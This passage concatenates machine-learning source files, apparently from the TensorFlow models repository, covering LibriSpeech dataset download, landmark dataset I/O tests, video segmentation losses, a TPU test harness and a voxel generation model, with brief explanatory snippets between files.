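CONTRACTION_WORDS = set(w + 'n' for w in
                        ['do', 'does', 'did', 'is', 'are', 'was', 'were', 'has',
                         'have', 'had', 'could', 'would', 'should', 'ca', 'wo',
                         'ai', 'might'])
def fix_contractions(words):
    words = words[:]
    for i in range(len(words)):
        if (words[i].lower() == "'t" and i > 0 and
                words[i - 1].lower() in CONTRACTION_WORDS):
            words[i] = words[i - 1][-1] + words[i]
            words[i - 1] = words[i - 1][:-1]
    return words
print(fix_contractions(['I', 'don', "'t", 'know']))  # ['I', 'do', "n't", 'know']
print(fix_contractions(['It', 'was', "n't", 'me']))  # already consistent, unchanged
```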
#### File: task_specific/word_level/word_level_scorer.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from corpus_processing import scorer
class WordLevelScorer(scorer.Scorer):
__metaclass__ = abc.ABCMeta
def __init__(self):
super(WordLevelScorer, self).__init__()
self._total_loss = 0
self._total_words = 0
self._examples = []
self._preds = []
def update(self, examples, predictions, loss):
super(WordLevelScorer, self).update(examples, predictions, loss)
n_words = 0
for example, preds in zip(examples, predictions):
self._examples.append(example)
self._preds.append(list(preds)[1:len(example.words) - 1])
n_words += len(example.words) - 2
self._total_loss += loss * n_words
self._total_words += n_words
def get_loss(self):
return self._total_loss / max(1, self._total_words)
```
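`get_loss` above returns a word-weighted average: each `update` call contributes `loss * n_words`, where `n_words` excludes the START and END tokens, and the accumulated sum is divided by the total word count. A quick numeric check of that weighting, independent of the class:
```python
# Two batches: 10 real words at loss 2.0 and 30 real words at loss 1.0.
batches = [(2.0, 10), (1.0, 30)]
total_loss = sum(loss * n for loss, n in batches)
total_words = sum(n for _, n in batches)
print(total_loss / max(1, total_words))  # 1.25, not the unweighted mean 1.5
```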
#### File: deep_speech/data/download.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import codecs
import fnmatch
import os
import sys
import tarfile
import tempfile
import unicodedata
from absl import app as absl_app
from absl import flags as absl_flags
import pandas
from six.moves import urllib
from sox import Transformer
import tensorflow as tf
LIBRI_SPEECH_URLS = {
"train-clean-100":
"http://www.openslr.org/resources/12/train-clean-100.tar.gz",
"train-clean-360":
"http://www.openslr.org/resources/12/train-clean-360.tar.gz",
"train-other-500":
"http://www.openslr.org/resources/12/train-other-500.tar.gz",
"dev-clean":
"http://www.openslr.org/resources/12/dev-clean.tar.gz",
"dev-other":
"http://www.openslr.org/resources/12/dev-other.tar.gz",
"test-clean":
"http://www.openslr.org/resources/12/test-clean.tar.gz",
"test-other":
"http://www.openslr.org/resources/12/test-other.tar.gz"
}
def download_and_extract(directory, url):
"""Download and extract the given split of dataset.
Args:
directory: the directory where to extract the tarball.
url: the url to download the data file.
"""
if not tf.gfile.Exists(directory):
tf.gfile.MakeDirs(directory)
_, tar_filepath = tempfile.mkstemp(suffix=".tar.gz")
try:
tf.logging.info("Downloading %s to %s" % (url, tar_filepath))
def _progress(count, block_size, total_size):
sys.stdout.write("\r>> Downloading {} {:.1f}%".format(
tar_filepath, 100.0 * count * block_size / total_size))
sys.stdout.flush()
urllib.request.urlretrieve(url, tar_filepath, _progress)
print()
statinfo = os.stat(tar_filepath)
tf.logging.info(
"Successfully downloaded %s, size(bytes): %d" % (url, statinfo.st_size))
with tarfile.open(tar_filepath, "r") as tar:
tar.extractall(directory)
finally:
tf.gfile.Remove(tar_filepath)
def convert_audio_and_split_transcript(input_dir, source_name, target_name,
output_dir, output_file):
"""Convert FLAC to WAV and split the transcript.
For audio file, convert the format from FLAC to WAV using the sox.Transformer
library.
For transcripts, each line contains the sequence id and the corresponding
transcript (separated by space):
Input data format: seq-id transcript_of_seq-id
For example:
1-2-0 transcript_of_1-2-0.flac
1-2-1 transcript_of_1-2-1.flac
...
Each sequence id has a corresponding .flac file.
Parse the transcript file and generate a new csv file which has three columns:
"wav_filename": the absolute path to a wav file.
"wav_filesize": the size of the corresponding wav file.
"transcript": the transcript for this audio segement.
Args:
input_dir: the directory which holds the input dataset.
source_name: the name of the specified dataset. e.g. test-clean
target_name: the directory name for the newly generated audio files.
e.g. test-clean-wav
output_dir: the directory to place the newly generated csv files.
output_file: the name of the newly generated csv file. e.g. test-clean.csv
"""
tf.logging.info("Preprocessing audio and transcript for %s" % source_name)
source_dir = os.path.join(input_dir, source_name)
target_dir = os.path.join(input_dir, target_name)
if not tf.gfile.Exists(target_dir):
tf.gfile.MakeDirs(target_dir)
files = []
tfm = Transformer()
# Convert all FLAC file into WAV format. At the same time, generate the csv
# file.
for root, _, filenames in tf.gfile.Walk(source_dir):
for filename in fnmatch.filter(filenames, "*.trans.txt"):
trans_file = os.path.join(root, filename)
with codecs.open(trans_file, "r", "utf-8") as fin:
for line in fin:
seqid, transcript = line.split(" ", 1)
          # We do an encode-decode transformation here because the output of
          # encode is a bytes object, which we need to convert to a string.
transcript = unicodedata.normalize("NFKD", transcript).encode(
"ascii", "ignore").decode("ascii", "ignore").strip().lower()
# Convert FLAC to WAV.
flac_file = os.path.join(root, seqid + ".flac")
wav_file = os.path.join(target_dir, seqid + ".wav")
if not tf.gfile.Exists(wav_file):
tfm.build(flac_file, wav_file)
wav_filesize = os.path.getsize(wav_file)
files.append((os.path.abspath(wav_file), wav_filesize, transcript))
# Write to CSV file which contains three columns:
# "wav_filename", "wav_filesize", "transcript".
csv_file_path = os.path.join(output_dir, output_file)
df = pandas.DataFrame(
data=files, columns=["wav_filename", "wav_filesize", "transcript"])
df.to_csv(csv_file_path, index=False, sep="\t")
tf.logging.info("Successfully generated csv file {}".format(csv_file_path))
def download_and_process_datasets(directory, datasets):
"""Download and pre-process the specified list of LibriSpeech dataset.
Args:
directory: the directory to put all the downloaded and preprocessed data.
datasets: list of dataset names that will be downloaded and processed.
"""
tf.logging.info("Preparing LibriSpeech dataset: {}".format(
",".join(datasets)))
for dataset in datasets:
tf.logging.info("Preparing dataset %s", dataset)
dataset_dir = os.path.join(directory, dataset)
download_and_extract(dataset_dir, LIBRI_SPEECH_URLS[dataset])
convert_audio_and_split_transcript(
dataset_dir + "/LibriSpeech", dataset, dataset + "-wav",
dataset_dir + "/LibriSpeech", dataset + ".csv")
def define_data_download_flags():
"""Define flags for data downloading."""
absl_flags.DEFINE_string(
"data_dir", "/tmp/librispeech_data",
"Directory to download data and extract the tarball")
absl_flags.DEFINE_bool("train_only", False,
"If true, only download the training set")
absl_flags.DEFINE_bool("dev_only", False,
"If true, only download the dev set")
absl_flags.DEFINE_bool("test_only", False,
"If true, only download the test set")
def main(_):
if not tf.gfile.Exists(FLAGS.data_dir):
tf.gfile.MakeDirs(FLAGS.data_dir)
if FLAGS.train_only:
download_and_process_datasets(
FLAGS.data_dir,
["train-clean-100", "train-clean-360", "train-other-500"])
elif FLAGS.dev_only:
download_and_process_datasets(FLAGS.data_dir, ["dev-clean", "dev-other"])
elif FLAGS.test_only:
download_and_process_datasets(FLAGS.data_dir, ["test-clean", "test-other"])
else:
# By default we download the entire dataset.
download_and_process_datasets(FLAGS.data_dir, LIBRI_SPEECH_URLS.keys())
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
define_data_download_flags()
FLAGS = absl_flags.FLAGS
absl_app.run(main)
```
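Each LibriSpeech `*.trans.txt` line has the form `seq-id transcript`, and the transcript is ASCII-folded, stripped, and lower-cased before being written to the CSV. The snippet below runs just that normalization on a made-up sample line.
```python
import unicodedata
line = "1-2-0 Café au lait, SAID THE SPEAKER\n"
seqid, transcript = line.split(" ", 1)
transcript = unicodedata.normalize("NFKD", transcript).encode(
    "ascii", "ignore").decode("ascii", "ignore").strip().lower()
print(seqid)       # 1-2-0
print(transcript)  # cafe au lait, said the speaker
```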
#### File: python/google_landmarks_dataset/dataset_file_io_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
from delf.python.google_landmarks_dataset import dataset_file_io
class DatasetFileIoTest(tf.test.TestCase):
def testReadRecognitionSolutionWorks(self):
# Define inputs.
file_path = os.path.join(tf.test.get_temp_dir(), 'recognition_solution.csv')
with tf.gfile.GFile(file_path, 'w') as f:
f.write('id,landmarks,Usage\n')
f.write('0123456789abcdef,0 12,Public\n')
f.write('0223456789abcdef,,Public\n')
f.write('0323456789abcdef,100,Ignored\n')
f.write('0423456789abcdef,1,Private\n')
f.write('0523456789abcdef,,Ignored\n')
# Run tested function.
(public_solution, private_solution,
ignored_ids) = dataset_file_io.ReadSolution(
file_path, dataset_file_io.RECOGNITION_TASK_ID)
# Define expected results.
expected_public_solution = {
'0123456789abcdef': [0, 12],
'0223456789abcdef': []
}
expected_private_solution = {
'0423456789abcdef': [1],
}
expected_ignored_ids = ['0323456789abcdef', '0523456789abcdef']
# Compare actual and expected results.
self.assertEqual(public_solution, expected_public_solution)
self.assertEqual(private_solution, expected_private_solution)
self.assertEqual(ignored_ids, expected_ignored_ids)
def testReadRetrievalSolutionWorks(self):
# Define inputs.
file_path = os.path.join(tf.test.get_temp_dir(), 'retrieval_solution.csv')
with tf.gfile.GFile(file_path, 'w') as f:
f.write('id,images,Usage\n')
f.write('0123456789abcdef,None,Ignored\n')
f.write('0223456789abcdef,fedcba9876543210 fedcba9876543200,Public\n')
f.write('0323456789abcdef,fedcba9876543200,Private\n')
f.write('0423456789abcdef,fedcba9876543220,Private\n')
f.write('0523456789abcdef,None,Ignored\n')
# Run tested function.
(public_solution, private_solution,
ignored_ids) = dataset_file_io.ReadSolution(
file_path, dataset_file_io.RETRIEVAL_TASK_ID)
# Define expected results.
expected_public_solution = {
'0223456789abcdef': ['fedcba9876543210', 'fedcba9876543200'],
}
expected_private_solution = {
'0323456789abcdef': ['fedcba9876543200'],
'0423456789abcdef': ['fedcba9876543220'],
}
expected_ignored_ids = ['0123456789abcdef', '0523456789abcdef']
# Compare actual and expected results.
self.assertEqual(public_solution, expected_public_solution)
self.assertEqual(private_solution, expected_private_solution)
self.assertEqual(ignored_ids, expected_ignored_ids)
def testReadRecognitionPredictionsWorks(self):
# Define inputs.
file_path = os.path.join(tf.test.get_temp_dir(),
'recognition_predictions.csv')
with tf.gfile.GFile(file_path, 'w') as f:
f.write('id,landmarks\n')
f.write('0123456789abcdef,12 0.1 \n')
f.write('0423456789abcdef,0 19.0\n')
f.write('0223456789abcdef,\n')
f.write('\n')
f.write('0523456789abcdef,14 0.01\n')
public_ids = ['0123456789abcdef', '0223456789abcdef']
private_ids = ['0423456789abcdef']
ignored_ids = ['0323456789abcdef', '0523456789abcdef']
# Run tested function.
public_predictions, private_predictions = dataset_file_io.ReadPredictions(
file_path, public_ids, private_ids, ignored_ids,
dataset_file_io.RECOGNITION_TASK_ID)
# Define expected results.
expected_public_predictions = {
'0123456789abcdef': {
'class': 12,
'score': 0.1
}
}
expected_private_predictions = {
'0423456789abcdef': {
'class': 0,
'score': 19.0
}
}
# Compare actual and expected results.
self.assertEqual(public_predictions, expected_public_predictions)
self.assertEqual(private_predictions, expected_private_predictions)
def testReadRetrievalPredictionsWorks(self):
# Define inputs.
file_path = os.path.join(tf.test.get_temp_dir(),
'retrieval_predictions.csv')
with tf.gfile.GFile(file_path, 'w') as f:
f.write('id,images\n')
f.write('0123456789abcdef,fedcba9876543250 \n')
f.write('0423456789abcdef,fedcba9876543260\n')
f.write('0223456789abcdef,fedcba9876543210 fedcba9876543200 '
'fedcba9876543220\n')
f.write('\n')
f.write('0523456789abcdef,\n')
public_ids = ['0223456789abcdef']
private_ids = ['0323456789abcdef', '0423456789abcdef']
ignored_ids = ['0123456789abcdef', '0523456789abcdef']
# Run tested function.
public_predictions, private_predictions = dataset_file_io.ReadPredictions(
file_path, public_ids, private_ids, ignored_ids,
dataset_file_io.RETRIEVAL_TASK_ID)
# Define expected results.
expected_public_predictions = {
'0223456789abcdef': [
'fedcba9876543210', 'fedcba9876543200', 'fedcba9876543220'
]
}
expected_private_predictions = {'0423456789abcdef': ['fedcba9876543260']}
# Compare actual and expected results.
self.assertEqual(public_predictions, expected_public_predictions)
self.assertEqual(private_predictions, expected_private_predictions)
if __name__ == '__main__':
tf.test.main()
```
#### File: feelvos/datasets/tfsequence_example_decoder.py
```python
import tensorflow as tf
slim = tf.contrib.slim
data_decoder = slim.data_decoder
class TFSequenceExampleDecoder(data_decoder.DataDecoder):
"""A decoder for TensorFlow SequenceExamples.
Decoding SequenceExample proto buffers is comprised of two stages:
(1) Example parsing and (2) tensor manipulation.
In the first stage, the tf.parse_single_sequence_example function is called
  with the configured context and sequence feature specs. These specs tell TF
how to parse the example. The output of this stage is a set of tensors.
In the second stage, the resulting tensors are manipulated to provide the
requested 'item' tensors.
To perform this decoding operation, a SequenceExampleDecoder is given a list
of ItemHandlers. Each ItemHandler indicates the set of features for stage 1
and contains the instructions for post_processing its tensors for stage 2.
"""
def __init__(self, keys_to_context_features, keys_to_sequence_features,
items_to_handlers):
"""Constructs the decoder.
Args:
keys_to_context_features: a dictionary from TF-SequenceExample context
keys to either tf.VarLenFeature or tf.FixedLenFeature instances.
See tensorflow's parsing_ops.py.
keys_to_sequence_features: a dictionary from TF-SequenceExample sequence
keys to either tf.VarLenFeature or tf.FixedLenSequenceFeature instances.
See tensorflow's parsing_ops.py.
items_to_handlers: a dictionary from items (strings) to ItemHandler
instances. Note that the ItemHandler's are provided the keys that they
use to return the final item Tensors.
Raises:
ValueError: if the same key is present for context features and sequence
features.
"""
unique_keys = set()
unique_keys.update(keys_to_context_features)
unique_keys.update(keys_to_sequence_features)
if len(unique_keys) != (
len(keys_to_context_features) + len(keys_to_sequence_features)):
# This situation is ambiguous in the decoder's keys_to_tensors variable.
raise ValueError('Context and sequence keys are not unique. \n'
' Context keys: %s \n Sequence keys: %s' %
(list(keys_to_context_features.keys()),
list(keys_to_sequence_features.keys())))
self._keys_to_context_features = keys_to_context_features
self._keys_to_sequence_features = keys_to_sequence_features
self._items_to_handlers = items_to_handlers
def list_items(self):
"""See base class."""
return self._items_to_handlers.keys()
def decode(self, serialized_example, items=None):
"""Decodes the given serialized TF-SequenceExample.
Args:
serialized_example: a serialized TF-SequenceExample tensor.
items: the list of items to decode. These must be a subset of the item
keys in self._items_to_handlers. If `items` is left as None, then all
of the items in self._items_to_handlers are decoded.
Returns:
the decoded items, a list of tensor.
"""
context, feature_list = tf.parse_single_sequence_example(
serialized_example, self._keys_to_context_features,
self._keys_to_sequence_features)
# Reshape non-sparse elements just once:
for k in self._keys_to_context_features:
v = self._keys_to_context_features[k]
if isinstance(v, tf.FixedLenFeature):
context[k] = tf.reshape(context[k], v.shape)
if not items:
items = self._items_to_handlers.keys()
outputs = []
for item in items:
handler = self._items_to_handlers[item]
keys_to_tensors = {
key: context[key] if key in context else feature_list[key]
for key in handler.keys
}
outputs.append(handler.tensors_to_item(keys_to_tensors))
return outputs
```
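The decoder above is configured with two feature-spec dictionaries, one for context features and one for per-frame sequence features, plus a map of item handlers. A minimal configuration could look like the sketch below, assuming TF 1.x where these spec classes live at the top level of the `tf` namespace; the key names are illustrative.
```python
import tensorflow as tf  # TF 1.x assumed
keys_to_context_features = {
    'video_id': tf.FixedLenFeature((), tf.string),
    'num_frames': tf.FixedLenFeature((), tf.int64),
}
keys_to_sequence_features = {
    'image/encoded': tf.FixedLenSequenceFeature((), tf.string),
    'image/label': tf.VarLenFeature(tf.int64),
}
# These dicts are passed to TFSequenceExampleDecoder together with
# items_to_handlers mapping item names (e.g. 'image') to slim ItemHandlers.
```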
#### File: feelvos/utils/train_utils.py
```python
import collections
import six
import tensorflow as tf
from deeplab.core import preprocess_utils
from deeplab.utils import train_utils
from feelvos.utils import embedding_utils
from feelvos.utils import eval_utils
slim = tf.contrib.slim
add_softmax_cross_entropy_loss_for_each_scale = (
train_utils.add_softmax_cross_entropy_loss_for_each_scale)
get_model_gradient_multipliers = train_utils.get_model_gradient_multipliers
get_model_learning_rate = train_utils.get_model_learning_rate
resolve_shape = preprocess_utils.resolve_shape
def add_triplet_loss_for_each_scale(batch_size, num_frames_per_video,
embedding_dim, scales_to_embeddings,
labels, scope):
"""Adds triplet loss for logits of each scale.
Args:
batch_size: Int, the number of video chunks sampled per batch
num_frames_per_video: Int, the number of frames per video.
embedding_dim: Int, the dimension of the learned embedding
scales_to_embeddings: A map from embedding names for different scales to
embeddings. The embeddings have shape [batch, embeddings_height,
embeddings_width, embedding_dim].
labels: Groundtruth labels with shape [batch, image_height, image_width, 1].
scope: String, the scope for the loss.
Raises:
ValueError: labels is None.
"""
if labels is None:
raise ValueError('No label for triplet loss.')
  for scale, embeddings in six.iteritems(scales_to_embeddings):
loss_scope = None
if scope:
loss_scope = '%s_%s' % (scope, scale)
# Label is downsampled to the same size as logits.
scaled_labels = tf.image.resize_nearest_neighbor(
labels,
resolve_shape(embeddings, 4)[1:3],
align_corners=True)
# Reshape from [batch * num_frames, ...] to [batch, num_frames, ...].
h = tf.shape(embeddings)[1]
w = tf.shape(embeddings)[2]
new_labels_shape = tf.stack([batch_size, num_frames_per_video, h, w, 1])
reshaped_labels = tf.reshape(scaled_labels, new_labels_shape)
new_embeddings_shape = tf.stack([batch_size, num_frames_per_video, h, w,
-1])
reshaped_embeddings = tf.reshape(embeddings, new_embeddings_shape)
with tf.name_scope(loss_scope):
total_loss = tf.constant(0, dtype=tf.float32)
for n in range(batch_size):
embedding = reshaped_embeddings[n]
label = reshaped_labels[n]
n_pixels = h * w
n_anchors_used = 256
sampled_anchor_indices = tf.random_shuffle(tf.range(n_pixels))[
:n_anchors_used]
anchors_pool = tf.reshape(embedding[0], [-1, embedding_dim])
anchors_pool_classes = tf.reshape(label[0], [-1])
anchors = tf.gather(anchors_pool, sampled_anchor_indices)
anchor_classes = tf.gather(anchors_pool_classes, sampled_anchor_indices)
pos_neg_pool = tf.reshape(embedding[1:], [-1, embedding_dim])
pos_neg_pool_classes = tf.reshape(label[1:], [-1])
dists = embedding_utils.pairwise_distances(anchors, pos_neg_pool)
pos_mask = tf.equal(anchor_classes[:, tf.newaxis],
pos_neg_pool_classes[tf.newaxis, :])
neg_mask = tf.logical_not(pos_mask)
pos_mask_f = tf.cast(pos_mask, tf.float32)
neg_mask_f = tf.cast(neg_mask, tf.float32)
pos_dists = pos_mask_f * dists + 1e20 * neg_mask_f
neg_dists = neg_mask_f * dists + 1e20 * pos_mask_f
pos_dists_min = tf.reduce_min(pos_dists, axis=1)
neg_dists_min = tf.reduce_min(neg_dists, axis=1)
margin = 1.0
loss = tf.nn.relu(pos_dists_min - neg_dists_min + margin)
# Handle case that no positive is present (per anchor).
any_pos = tf.reduce_any(pos_mask, axis=1)
loss *= tf.cast(any_pos, tf.float32)
# Average over anchors
loss = tf.reduce_mean(loss, axis=0)
total_loss += loss
total_loss /= batch_size
# Scale the loss up a bit.
total_loss *= 3.0
tf.add_to_collection(tf.GraphKeys.LOSSES, total_loss)
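# In summary, the per-anchor term above is a hinge loss
#   L_a = max(0, min_pos_dist(a) - min_neg_dist(a) + margin),
# where min_pos_dist is the distance from anchor a (a pixel embedding of the
# first frame) to its nearest same-class pixel in the remaining frames and
# min_neg_dist the distance to its nearest different-class pixel; the 1e20
# terms simply exclude the wrong class from each minimum. Anchors without any
# positive contribute zero, and the anchor-mean is averaged over the batch and
# scaled by 3.0 before being added to the LOSSES collection.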
def add_dynamic_softmax_cross_entropy_loss_for_each_scale(
scales_to_logits, labels, ignore_label, loss_weight=1.0,
upsample_logits=True, scope=None, top_k_percent_pixels=1.0,
hard_example_mining_step=100000):
"""Adds softmax cross entropy loss per scale for logits with varying classes.
Also adds summaries for mIoU.
Args:
scales_to_logits: A map from logits names for different scales to logits.
The logits are a list of length batch_size of tensors of shape
[time, logits_height, logits_width, num_classes].
labels: Groundtruth labels with shape [batch_size * time, image_height,
image_width, 1].
ignore_label: Integer, label to ignore.
loss_weight: Float, loss weight.
upsample_logits: Boolean, upsample logits or not.
scope: String, the scope for the loss.
top_k_percent_pixels: A float, the value lies in [0.0, 1.0]. When its
value < 1.0, only compute the loss for the top k percent pixels (e.g.,
the top 20% pixels). This is useful for hard pixel mining.
hard_example_mining_step: An integer, the training step in which the
      hard example mining kicks off. Note that we gradually reduce the
mining percent to the top_k_percent_pixels. For example, if
hard_example_mining_step=100K and top_k_percent_pixels=0.25, then
mining percent will gradually reduce from 100% to 25% until 100K steps
after which we only mine top 25% pixels.
Raises:
ValueError: Label or logits is None.
"""
if labels is None:
raise ValueError('No label for softmax cross entropy loss.')
if top_k_percent_pixels < 0 or top_k_percent_pixels > 1:
raise ValueError('Unexpected value of top_k_percent_pixels.')
for scale, logits in six.iteritems(scales_to_logits):
loss_scope = None
if scope:
loss_scope = '%s_%s' % (scope, scale)
if upsample_logits:
# Label is not downsampled, and instead we upsample logits.
assert isinstance(logits, collections.Sequence)
logits = [tf.image.resize_bilinear(
x,
preprocess_utils.resolve_shape(labels, 4)[1:3],
align_corners=True) for x in logits]
scaled_labels = labels
else:
# Label is downsampled to the same size as logits.
assert isinstance(logits, collections.Sequence)
scaled_labels = tf.image.resize_nearest_neighbor(
labels,
preprocess_utils.resolve_shape(logits[0], 4)[1:3],
align_corners=True)
batch_size = len(logits)
num_time = preprocess_utils.resolve_shape(logits[0])[0]
reshaped_labels = tf.reshape(
scaled_labels, ([batch_size, num_time] +
preprocess_utils.resolve_shape(scaled_labels)[1:]))
for n, logits_n in enumerate(logits):
labels_n = reshaped_labels[n]
labels_n = tf.reshape(labels_n, shape=[-1])
not_ignore_mask = tf.to_float(tf.not_equal(labels_n,
ignore_label)) * loss_weight
num_classes_n = tf.shape(logits_n)[-1]
one_hot_labels = slim.one_hot_encoding(
labels_n, num_classes_n, on_value=1.0, off_value=0.0)
logits_n_flat = tf.reshape(logits_n, shape=[-1, num_classes_n])
if top_k_percent_pixels == 1.0:
tf.losses.softmax_cross_entropy(
one_hot_labels,
logits_n_flat,
weights=not_ignore_mask,
scope=loss_scope)
else:
# Only compute the loss for top k percent pixels.
# First, compute the loss for all pixels. Note we do not put the loss
# to loss_collection and set reduction = None to keep the shape.
num_pixels = tf.to_float(tf.shape(logits_n_flat)[0])
pixel_losses = tf.losses.softmax_cross_entropy(
one_hot_labels,
logits_n_flat,
weights=not_ignore_mask,
scope='pixel_losses',
loss_collection=None,
reduction=tf.losses.Reduction.NONE)
# Compute the top_k_percent pixels based on current training step.
if hard_example_mining_step == 0:
# Directly focus on the top_k pixels.
top_k_pixels = tf.to_int32(top_k_percent_pixels * num_pixels)
else:
# Gradually reduce the mining percent to top_k_percent_pixels.
global_step = tf.to_float(tf.train.get_or_create_global_step())
ratio = tf.minimum(1.0, global_step / hard_example_mining_step)
top_k_pixels = tf.to_int32(
(ratio * top_k_percent_pixels + (1.0 - ratio)) * num_pixels)
_, top_k_indices = tf.nn.top_k(pixel_losses,
k=top_k_pixels,
sorted=True,
name='top_k_percent_pixels')
# Compute the loss for the top k percent pixels.
tf.losses.softmax_cross_entropy(
tf.gather(one_hot_labels, top_k_indices),
tf.gather(logits_n_flat, top_k_indices),
weights=tf.gather(not_ignore_mask, top_k_indices),
scope=loss_scope)
pred_n = tf.argmax(logits_n, axis=-1, output_type=tf.int32)[
..., tf.newaxis]
labels_n = labels[n * num_time: (n + 1) * num_time]
miou = eval_utils.calculate_multi_object_miou_tf(pred_n, labels_n)
tf.summary.scalar('miou', miou)
def get_model_init_fn(train_logdir,
tf_initial_checkpoint,
initialize_last_layer,
last_layers,
ignore_missing_vars=False):
"""Gets the function initializing model variables from a checkpoint.
Args:
train_logdir: Log directory for training.
tf_initial_checkpoint: TensorFlow checkpoint for initialization.
initialize_last_layer: Initialize last layer or not.
last_layers: Last layers of the model.
ignore_missing_vars: Ignore missing variables in the checkpoint.
Returns:
Initialization function.
"""
if tf_initial_checkpoint is None:
tf.logging.info('Not initializing the model from a checkpoint.')
return None
if tf.train.latest_checkpoint(train_logdir):
tf.logging.info('Ignoring initialization; other checkpoint exists')
return None
tf.logging.info('Initializing model from path: %s', tf_initial_checkpoint)
# Variables that will not be restored.
exclude_list = ['global_step']
if not initialize_last_layer:
exclude_list.extend(last_layers)
variables_to_restore = slim.get_variables_to_restore(exclude=exclude_list)
if variables_to_restore:
return slim.assign_from_checkpoint_fn(
tf_initial_checkpoint,
variables_to_restore,
ignore_missing_vars=ignore_missing_vars)
return None
```
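The hard-example-mining schedule inside `add_dynamic_softmax_cross_entropy_loss_for_each_scale` anneals the mined fraction of pixels linearly with the training step. A small plain-Python sketch of that schedule (illustrative only; in the real loss this is computed on tensors):
```python
def mined_fraction(global_step, top_k_percent_pixels=0.25,
                   hard_example_mining_step=100000):
  """Fraction of pixels whose loss is kept at a given training step."""
  if hard_example_mining_step == 0:
    return top_k_percent_pixels  # mining is fully active from step 0
  ratio = min(1.0, global_step / float(hard_example_mining_step))
  # Linearly anneal from 1.0 (all pixels) down to top_k_percent_pixels.
  return ratio * top_k_percent_pixels + (1.0 - ratio)

print(mined_fraction(0))       # 1.0   -> every pixel contributes
print(mined_fraction(50000))   # 0.625
print(mined_fraction(100000))  # 0.25  -> only the hardest 25% of pixels
```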
#### File: object_detection/utils/test_case.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from six.moves import zip
import tensorflow as tf
from tensorflow.contrib import tpu
flags = tf.app.flags
flags.DEFINE_bool('tpu_test', False, 'Whether to configure test for TPU.')
FLAGS = flags.FLAGS
class TestCase(tf.test.TestCase):
"""Extends tf.test.TestCase to optionally allow running tests on TPU."""
def execute_tpu(self, graph_fn, inputs):
"""Constructs the graph, executes it on TPU and returns the result.
Args:
graph_fn: a callable that constructs the tensorflow graph to test. The
arguments of this function should correspond to `inputs`.
inputs: a list of numpy arrays to feed input to the computation graph.
Returns:
A list of numpy arrays or a scalar returned from executing the tensorflow
graph.
"""
with self.test_session(graph=tf.Graph()) as sess:
placeholders = [tf.placeholder_with_default(v, v.shape) for v in inputs]
tpu_computation = tpu.rewrite(graph_fn, placeholders)
sess.run(tpu.initialize_system())
sess.run([tf.global_variables_initializer(), tf.tables_initializer(),
tf.local_variables_initializer()])
materialized_results = sess.run(tpu_computation,
feed_dict=dict(zip(placeholders, inputs)))
sess.run(tpu.shutdown_system())
if (hasattr(materialized_results, '__len__') and
len(materialized_results) == 1 and
(isinstance(materialized_results, list) or
isinstance(materialized_results, tuple))):
materialized_results = materialized_results[0]
return materialized_results
def execute_cpu(self, graph_fn, inputs):
"""Constructs the graph, executes it on CPU and returns the result.
Args:
graph_fn: a callable that constructs the tensorflow graph to test. The
arguments of this function should correspond to `inputs`.
inputs: a list of numpy arrays to feed input to the computation graph.
Returns:
A list of numpy arrays or a scalar returned from executing the tensorflow
graph.
"""
with self.test_session(graph=tf.Graph()) as sess:
placeholders = [tf.placeholder_with_default(v, v.shape) for v in inputs]
results = graph_fn(*placeholders)
sess.run([tf.global_variables_initializer(), tf.tables_initializer(),
tf.local_variables_initializer()])
materialized_results = sess.run(results, feed_dict=dict(zip(placeholders,
inputs)))
if (hasattr(materialized_results, '__len__') and
len(materialized_results) == 1 and
(isinstance(materialized_results, list) or
isinstance(materialized_results, tuple))):
materialized_results = materialized_results[0]
return materialized_results
def execute(self, graph_fn, inputs):
"""Constructs the graph, creates a test session and returns the results.
The graph is executed either on TPU or CPU based on the `tpu_test` flag.
Args:
graph_fn: a callable that constructs the tensorflow graph to test. The
arguments of this function should correspond to `inputs`.
inputs: a list of numpy arrays to feed input to the computation graph.
Returns:
A list of numpy arrays or a scalar returned from executing the tensorflow
graph.
"""
if FLAGS.tpu_test:
return self.execute_tpu(graph_fn, inputs)
else:
return self.execute_cpu(graph_fn, inputs)
```
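A minimal sketch of how a test could be written against the `TestCase` above (the test and its `graph_fn` are hypothetical; the `--tpu_test` flag selects the TPU path at runtime):
```python
import numpy as np
import tensorflow as tf
from object_detection.utils import test_case


class ElementwiseAddTest(test_case.TestCase):

  def test_add(self):
    def graph_fn(a, b):
      # One argument per entry of `inputs`, as documented above.
      return a + b

    a = np.array([1.0, 2.0], dtype=np.float32)
    b = np.array([3.0, 4.0], dtype=np.float32)
    result = self.execute(graph_fn, [a, b])
    self.assertAllClose(result, [4.0, 6.0])


if __name__ == '__main__':
  tf.test.main()
```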
#### File: research/ptn/model_voxel_generation.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import os
import numpy as np
from six.moves import xrange
import tensorflow as tf
import input_generator
import utils
slim = tf.contrib.slim
class Im2Vox(object):
"""Defines the voxel generation model."""
__metaclass__ = abc.ABCMeta
def __init__(self, params):
self._params = params
@abc.abstractmethod
def get_metrics(self, inputs, outputs):
"""Gets dictionaries from metrics to value `Tensors` & update `Tensors`."""
pass
@abc.abstractmethod
def get_loss(self, inputs, outputs):
pass
@abc.abstractmethod
def get_regularization_loss(self, scopes):
pass
def set_params(self, params):
self._params = params
def get_inputs(self,
dataset_dir,
dataset_name,
split_name,
batch_size,
image_size,
vox_size,
is_training=True):
"""Loads data for a specified dataset and split."""
del image_size, vox_size
with tf.variable_scope('data_loading_%s/%s' % (dataset_name, split_name)):
common_queue_min = 64
common_queue_capacity = 256
num_readers = 4
inputs = input_generator.get(
dataset_dir,
dataset_name,
split_name,
shuffle=is_training,
num_readers=num_readers,
common_queue_min=common_queue_min,
common_queue_capacity=common_queue_capacity)
images, voxels = tf.train.batch(
[inputs['image'], inputs['voxel']],
batch_size=batch_size,
num_threads=8,
capacity=8 * batch_size,
name='batching_queues/%s/%s' % (dataset_name, split_name))
outputs = dict()
outputs['images'] = images
outputs['voxels'] = voxels
outputs['num_samples'] = inputs['num_samples']
return outputs
def preprocess(self, raw_inputs, step_size):
"""Selects the subset of viewpoints to train on."""
(quantity, num_views) = raw_inputs['images'].get_shape().as_list()[:2]
inputs = dict()
inputs['voxels'] = raw_inputs['voxels']
for k in xrange(step_size):
inputs['images_%d' % (k + 1)] = []
